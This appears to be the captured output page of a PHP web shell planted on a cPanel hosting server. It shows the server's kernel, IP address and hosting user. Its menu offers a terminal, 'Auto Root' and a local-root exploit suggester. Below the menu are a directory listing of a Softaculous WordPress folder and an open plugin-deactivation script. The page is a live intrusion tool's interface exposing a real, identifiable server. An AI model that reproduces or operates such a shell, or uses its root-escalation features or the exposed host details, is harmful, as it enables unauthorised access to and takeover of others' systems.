Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
languages
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
php53
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
php56
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
php71
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
php81
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
php82
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
plugins
[ DIR ]
drwxr-xr-x
2025-12-05 06:47
.htaccess
482
B
-rw-r--r--
2021-12-15 22:02
_htaccess
553
B
-rw-r--r--
2021-12-15 22:02
_index.php
59
B
-rw-r--r--
2021-12-15 22:02
_wp-config.php
3.37
KB
-rw-r--r--
2025-04-15 20:47
add_user.php
461
B
-rw-r--r--
2021-12-15 22:02
backup.php
3.02
KB
-rw-r--r--
2025-12-04 01:15
check_charset.php
2.02
KB
-rw-r--r--
2021-12-15 22:02
clone.php
32.11
KB
-rw-r--r--
2025-12-04 01:15
clone.xml
497
B
-rw-r--r--
2021-12-15 22:02
edit.php
9.93
KB
-rw-r--r--
2025-12-04 01:15
edit.xml
1.98
KB
-rw-r--r--
2025-07-15 03:59
extend.php
101.87
KB
-rw-r--r--
2025-12-04 01:15
fileindex.php
291
B
-rw-r--r--
2021-12-15 22:02
import.php
6.56
KB
-rw-r--r--
2025-12-04 01:15
info.xml
16
KB
-rw-r--r--
2025-12-04 01:14
install.js
4.2
KB
-rw-r--r--
2025-06-30 01:57
install.php
32.11
KB
-rw-r--r--
2025-12-04 01:15
install.xml
10.41
KB
-rw-r--r--
2025-07-24 22:58
md5
4.51
KB
-rw-r--r--
2025-12-04 01:15
multisite.sql
37.99
KB
-rw-r--r--
2025-12-02 23:25
notes.txt
6.07
KB
-rw-r--r--
2025-12-02 23:25
plugin_activate.php
596
B
-rw-r--r--
2021-12-15 22:02
plugin_deactivate.php
613
B
-rw-r--r--
2021-12-15 22:02
post_download.json
72
B
-rw-r--r--
2022-05-25 01:00
sign_on.php
3.28
KB
-rw-r--r--
2025-01-27 22:04
soft.htaccess
127
B
-rw-r--r--
2021-12-15 22:02
update_pass.php
639
B
-rw-r--r--
2025-12-03 21:15
upgrade.php
14.69
KB
-rw-r--r--
2025-12-04 01:15
upgrade.xml
1.83
KB
-rw-r--r--
2025-07-15 03:59
wp-cli
6.19
MB
-rwxr-xr-x
2022-07-14 19:49
wp-config.php
3.08
KB
-rw-r--r--
2024-11-12 22:30
wp.sql
30.37
KB
-rw-r--r--
2025-12-02 23:25
wp.zip
27.05
MB
-rw-r--r--
2025-12-02 23:25
Save
Rename
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } require_once('wp-blog-header.php'); require_once('wp-includes/pluggable.php'); require_once('wp-admin/includes/plugin.php'); $plugins_to_deactivate = '[[plugins_to_deactivate]]'; $plugins_to_deactivate = unserialize($plugins_to_deactivate); $ret = array(); foreach($plugins_to_deactivate as $plugn_file){ // null means success $ret[$plugn_file] = deactivate_plugins($plugn_file); } echo '<plugin_deactivate>'.serialize($ret).'</plugin_deactivate>'; exit(0);